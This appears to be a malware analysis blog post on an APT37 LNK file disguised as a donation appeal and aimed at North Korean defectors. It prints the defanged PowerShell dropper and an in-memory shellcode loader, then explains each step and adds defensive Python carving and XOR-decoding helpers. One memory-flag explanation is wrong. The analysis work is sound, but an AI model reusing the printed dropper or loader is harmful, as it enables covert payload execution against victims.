꿈을꾸는 파랑새

Today I will write about 김x민대표님모금캠페인.lnk (2024.10.31), a piece of malware built by the North Korean hacking group APT37 (Reaper), which targets North Korean defectors. It was distributed disguised as a fundraising campaign for Kim x-min, the head of Free North Korea Radio (자유북한방송).
It is dressed up as a document in which a defector organisation collects donations after a brain tumour was found in that representative, but it is in fact malware.
File name: 김X민대표님모금캠페인.lnk
Size: 222 MB
MD5: 144928fc87e1d50f5ed162bb1651ab24
SHA-1: e917166ed0096688994709acb94233ba3f3be39b
SHA-256: c045b9da0456430268861da18735f7e8ebb2d1df771ca803a2535bdc8f7a6e89

PowerShell code contained in the malware

StringData
{
 namestring: 
 relativepath: not present
 workingdir: not present
 commandlinearguments: /k for /f "t(o)kens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShe(l)l\v1.0\*rshell(.)exe /s /b /od') do c(a)ll %a "$(d)irPath = Get-Location; if($dirPath -Match 'Sys(t)em32' -or $dirPath -Match 'Program Files') {($)d(i)rPath = '%temp%'};$exs=@('(.)lnk');$lnkPath = Get-ChildItem -Path $dirP(a)th -Recur(s)e *.* -File | w(h)ere {$_.extension -in $exs} | where-object {$_.length -eq 0x0(D)DA0CDE} | Select(-)Object -ExpandPro(p)erty FullName ;$ln(k)File=New-Ob(j)ect System.IO.Fi(l)eStream($lnkPath, [System.IO.FileMode]::Open, [System(.)IO(.)FileAccess]::R(e)ad);$lnkFile(.)Seek(0x0000111A, [System(.)IO(.)SeekOrigin]::Begin);$pdfFile=Ne(w)-Object byte[] 0x0006A93F;$lnkFile(.)Read($pdfFile, 0, 0x0(0)06A93F);$pdfPath = $lnkPath.replace('.lnk'(,)'.pdf');sc $pdfPath $(p)dfFile -Encoding Byte;& $pdfPath;$lnk(F)ile.Seek(0x00(0)6BA59,[System.IO.SeekO(r)igin]::Begin);$exeFile=New-Object byte[] 0(x)000D9190;$lnkFile(.)Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\caption(.)dat';sc $exePath $e(x)eFile -Encoding Byte;$lnkFile.Seek(0x0(0)144BE9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000(6)36;$lnkFile.Read($stringByte, 0, 0x00000636); $batStrPath = $env:temp+'\'(+)'elephant(.)dat';$string = [System.Text.Encoding]::UTF8.GetString($s(t)ringByte);$stri(n)g | Out-File -FilePath $(b)atStrPath -Encoding ascii;$lnkFile(.)Seek(0x0014521F,[System(.)IO(.)SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014(7);$lnkFile.Read($batByte, 0, 0x00000147);$executePath = $env:temp+'\'+'shark'+'e.b'(+)'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastStr(i)ng = [System.Text.Encoding]::UTF8.GetString($bat(B)yte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$exe(c)utePath; $lnkFile.Close(); remove-item -path $l(n)kPath -force; "&& exit
 iconlocation: C:\Progra(m) Files (x86)\Microsoft\Edge\Application\msedge(.)exe
}

Malware analysis

1. Initial command execution
The /s /b /od options include subdirectories, print full paths, and sort by modification date (newest first).
2. Path and filter handling
If it is running from inside System32 or Program Files, it moves to %TEMP%.
3. LNK file search and filtering
It searches for files with the .lnk extension whose size is exactly 0x0DDA0CDE bytes.
4. Splitting out the files and writing them
PDF data is extracted from offset 0x111A inside the LNK -> an openable PDF (the decoy file).
5. EXE payload extraction
In the same way, the EXE payload is extracted from inside the LNK -> saved as caption.dat.
6. String and BAT file creation
A string and additional BAT commands are created -> saved as elephant.dat and sharke.bat and executed.
Summary
Uses the dir command to look in C:\Windows\SysWow64\WindowsPowerShell\v1.0 for an executable whose name matches the pattern rshell.exe
Runs that file via call, passing it the PowerShell commands
Gets the current directory with Get-Location and, if it meets certain conditions (System32, Program Files), switches to %TEMP%
Recursively enumerates .lnk files and filters for the one whose size is exactly 0x0DDA0CDE (233,107,934 bytes)
Extracts the following from that file:
A PDF-format binary (offset 0x0000111A, size 0x6A93F)
An EXE-format payload (offset 0x0006BA59, size 0xD9190)
String data (offset 0x00144BE9, size 0x636)
A BAT script binary (offset 0x0014521F, size 0x147)
Saves each as .pdf, .dat, .bat and so on, executes them, and acts with malicious intent
The .lnk file that was executed is deleted immediately
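For triage, the same Seek/Read sequence can be replayed offline against a copy of the LNK so that each embedded artifact is carved and classified without running anything. The Python below is an added example, not code from this post or from the malware: it uses the offsets and sizes listed above, checks the Shell Link HeaderSize (0x4C) before carving, refuses files too short for a segment, and applies the dropper's size gate only on request because build_sample() constructs a much smaller stand-in with a marker at each carve point. The 'd' XOR pass on caption.dat reflects what the second stage does, so the carved EXE can be recognised as a PE.

```python
"""
Carve the artifacts the LNK's PowerShell one-liner extracts, using the
offsets and sizes listed in the post. Added example; not code from the post
or from the malware. The sample returned by build_sample() is constructed.
"""

# Offset/size pairs from the post's summary; keys are the names the dropper writes.
SEGMENTS = {
    "decoy.pdf":    (0x0000111A, 0x0006A93F),
    "caption.dat":  (0x0006BA59, 0x000D9190),
    "elephant.dat": (0x00144BE9, 0x00000636),
    "sharke.bat":   (0x0014521F, 0x00000147),
}

# Size the dropper's where-object filter gates on (the real sample). The
# constructed sample below is smaller, so carve() takes the gate as a parameter.
REAL_LNK_SIZE = 0x0DDA0CDE
XOR_KEY = 0x64  # 'd', the single-byte key the post identifies in elephant.dat


def identify(data: bytes) -> str:
    """Classify a carved segment by its leading bytes."""
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"$") or data.startswith(b"@echo"):
        return "script"
    return "unknown"


def carve(blob: bytes, segments=SEGMENTS, expected_size=None):
    """Return {name: bytes} for every segment, mirroring the FileStream
    Seek/Read sequence in the LNK. Refuses non-LNK input and files too short
    for a segment; optionally enforces the dropper's exact-size gate."""
    if blob[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a Shell Link: HeaderSize != 0x4C")
    if expected_size is not None and len(blob) != expected_size:
        raise ValueError(f"size {len(blob):#x} != gate {expected_size:#x}")
    out = {}
    for name, (offset, size) in segments.items():
        if offset + size > len(blob):
            raise ValueError(f"{name}: {offset:#x}+{size:#x} runs past EOF")
        out[name] = blob[offset:offset + size]
    return out


def build_sample() -> bytes:
    """Constructed stand-in for the LNK: zero-filled to the end of the last
    segment, with a recognisable marker placed at each carve offset."""
    end = max(o + s for o, s in SEGMENTS.values())
    buf = bytearray(end)
    buf[0:4] = b"\x4c\x00\x00\x00"  # Shell Link HeaderSize
    markers = {
        "decoy.pdf":    b"%PDF-1.4\n% constructed decoy\n",
        # XOR-encoded with 'd', as caption.dat is in the real sample
        "caption.dat":  bytes(b ^ XOR_KEY for b in b"MZ\x90\x00constructed stub"),
        "elephant.dat": b"$exePath = 'constructed second stage'\n",
        "sharke.bat":   b"@echo off\nrem constructed runner\n",
    }
    for name, (offset, _) in SEGMENTS.items():
        buf[offset:offset + len(markers[name])] = markers[name]
    return bytes(buf)


def triage(blob: bytes):
    """Carve and classify every segment; also report what caption.dat looks
    like after the single-byte XOR pass the second stage applies."""
    carved = carve(blob)
    report = {name: identify(data) for name, data in carved.items()}
    decoded = bytes(b ^ XOR_KEY for b in carved["caption.dat"])
    report["caption.dat (xor d)"] = identify(decoded)
    return report


if __name__ == "__main__":
    for name, kind in triage(build_sample()).items():
        print(f"{name:24s} {kind}")
```

Run against a real copy, call carve(blob, expected_size=REAL_LNK_SIZE) so a sample that does not match the dropper's own size gate is reported rather than silently carved at the wrong offsets.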

Contents of the PDF the malware creates

When the PDF is opened it shows a photo of former president Yoon Suk-yeol and the presentation of the Dongbaek Medal (Order of Civil Merit), along with the text, but evidently little care went into it: the image quality is noticeably poor.

Contents of elephant.dat

$exePath=$env:temp(+)'\caption(.)dat';$exeFile = Ge(t)-Content -pa(t)h $exeP(a)th -encodin(g) byte;$le(n)=$exeFile(.)count;$(n)ew(E)xeFile = New-Ob(j)ect Byte[] $len;($)xK='d';for($(i)=0;$i -lt $len;$(i)++) {$new(E)xeFile[$i] = $exe(F)ile[$i] -bxor $xk[0]}; [Net.Se(r)vicePointManager]::Secur(i)tyProtocol = [Enum]::To(O)bject([Net(.)Sec(u)rityProto(c)olType], 30(7)2);$k(1)123 = [System(.)Text(.)Encoding]::UTF8(.)GetString(34) + 'kernel32(.)dll' + [System.T(e)xt.Encoding]::UTF8(.)GetString(34);$(a)90234s = '[DllIm(p)ort(' + $k1123 (+) ')]public sta(t)ic e(x)tern Int(P)tr Globa(l)Alloc(uint b,(u)int c);';$b = Add-T(y)pe -Member(D)efinition $a90(2)34s  -Name 'AAA' -PassThr(u);$d3s9sdf = '[D(l)lImport(' + ($)k1123 + ')]public stat(i)c extern bool Vir(t)ualProtect(I(n)tPtr a,ui(n)t b,(u)int c,(o)ut IntPt(r) d);';$a90234sb = Add-Type -MemberDefinition $d3s9sdf -Name 'AAB' -PassThru;$b3s9s03sfse = '[DllImport(' + $k1123 + ')]public static extern IntPtr CreateThre(a)d(IntPtr a,uin(t) b,IntPtr c,I(n)tPtr d,uint e(,)IntPtr f);';$cake3(s)(d)23 = Add(-)Type -Membe(r)Definition $b3s9(s)03sfse  -Nam(e) 'BBB' -PassThr(u);$dt(t)(s)9s03sd23 = '[Dll(I)mport(' + $(k)1123 + ')]publ(i)c static exter(n) IntPtr Wai(t)ForSingleObject((I)ntPtr a,uint b);';$fried3sd23 = Add-Type -MemberDefinition $dtts9s03sd23 -Name 'DDD' -PassThru;$byteCount = $newExeFile.Length;$buffer = $b::GlobalAlloc(0x0040, $byteC(o)unt (+) 0(x)100);$old = 0;$a9023(4)sb::Virtual(P)rotect($buff(e)r, $b(y)teCo(u)nt + 0x(1)00, 0(x)40, [ref(])$old); for($(i) = 0;$i -lt $byteCo(u)nt;$i++) { [System(.)Runtime(.)InteropServices(.)Marshal]::Writ(e)Byte($buffer, $i, $ne(w)E(x)eFile[$i]); };$handle = $cake3sd23::Create(T)hread(0, 0, $buffer, 0, 0, 0);$frie(d)3sd23::WaitForSingle(O)bject($handle, 500 * 1000);

Malware analysis

1. Loading the XOR-decrypted executable
Reads the data byte by byte from %TEMP%\caption.dat
Decrypts it with the XOR key d (0x64)
caption.dat is an XOR-encoded executable
2. Security bypass and .NET DllImport
Sets TLS 1.2 -> preparation for network communication
3. Defining kernel32.dll functions for P/Invoke
Builds the [kernel32.dll] string
DllImport definitions so that the Windows APIs can be called directly from the .NET environment
4. Loading and executing the PE file directly in memory
GlobalAlloc: allocates an executable memory region (0x0040 -> GMEM_MOVEABLE)
VirtualProtect: sets the protection of the allocated memory to PAGE_EXECUTE_READWRITE (0x40)

5. Writing the code or EXE binary into memory
Copies the binary data directly to the memory address
A reflective loader or shellcode injection technique
6. Thread creation and waiting
CreateThread executes the binary from its starting point
WaitForSingleObject waits up to 500 seconds for the thread to finish
Summary
Reads the binary data from caption.dat
Performs XOR decryption (single key: d)
Allocates memory for the decrypted binary
Sets memory protection and executes through kernel32.dll functions
CreateThread -> WaitForSingleObject -> shellcode execution
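The decryption step is simple enough to reproduce on the bench, and doing so is the quickest way to confirm that caption.dat really is a PE rather than a further stage. The Python below is an added example, not code from this post or from the malware: it applies the single-byte XOR the second stage uses, validates the result by checking the MZ header and the e_lfanew pointer to the PE signature, and, going beyond the post, recovers an unknown single-byte key by trying all 256 values against that check. loader_indicators() lists the tokens of the in-memory execution chain the post describes (DllImport of GlobalAlloc, VirtualProtect, CreateThread, WaitForSingleObject plus the -bxor loop) so a decoded script can be flagged for escalation. The PE-shaped blob and the CONSTRUCTED_STAGE string are constructed for the example.

```python
"""
Decode caption.dat the way elephant.dat does (single-byte XOR with 'd'),
validate the result as a PE, and recover an unknown single-byte key by
scanning for the MZ/PE header. Added example; not the post's or the
malware's code. build_fake_pe() and CONSTRUCTED_STAGE are constructed.
"""

XOR_KEY = ord("d")  # 0x64, the key the post identifies in elephant.dat


def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same transform the second stage's -bxor loop applies."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data: bytes) -> bool:
    """MZ header plus an e_lfanew that points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_single_byte_key(data: bytes):
    """Try every byte value; return the key that yields a PE, or None."""
    for key in range(256):
        if looks_like_pe(xor_decode(data, key)):
            return key
    return None


# Tokens of the in-memory loader chain the post describes. A decoded script
# carrying all of them is a strong indicator of this loader pattern.
LOADER_TOKENS = ["DllImport", "kernel32", "GlobalAlloc", "VirtualProtect",
                 "CreateThread", "WaitForSingleObject", "-bxor", "Marshal"]


def loader_indicators(script: str):
    """Return the loader tokens present in a script, case-insensitively."""
    lowered = script.lower()
    return [t for t in LOADER_TOKENS if t.lower() in lowered]


def build_fake_pe() -> bytes:
    """Constructed minimal PE-shaped blob: MZ, e_lfanew = 0x80, PE signature."""
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = (0x80).to_bytes(4, "little")
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


def build_encoded_sample() -> bytes:
    """Constructed stand-in for caption.dat: the fake PE XOR-encoded with 'd'."""
    return xor_decode(build_fake_pe(), XOR_KEY)


# Constructed text that only carries the tokens; it is not a working loader.
CONSTRUCTED_STAGE = (
    "-bxor $k; Add-Type -MemberDefinition '[DllImport(\"kernel32.dll\")]' "
    "GlobalAlloc VirtualProtect [System.Runtime.InteropServices.Marshal]::WriteByte "
    "CreateThread WaitForSingleObject"
)


if __name__ == "__main__":
    enc = build_encoded_sample()
    key = recover_single_byte_key(enc)
    print(f"recovered key: {key:#x} ({chr(key)!r})" if key is not None else "no key found")
    print("decoded is PE:", looks_like_pe(xor_decode(enc, XOR_KEY)))
    print("loader indicators:", loader_indicators(CONSTRUCTED_STAGE))
```

The header check deliberately requires both the MZ bytes and a consistent e_lfanew: checking MZ alone would accept a false positive for any key that happens to map the first two bytes to 0x4D 0x5A.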
That covers 김x민대표님모금캠페인.lnk (2024.10.31), malware built to attack North Korean defectors directly.
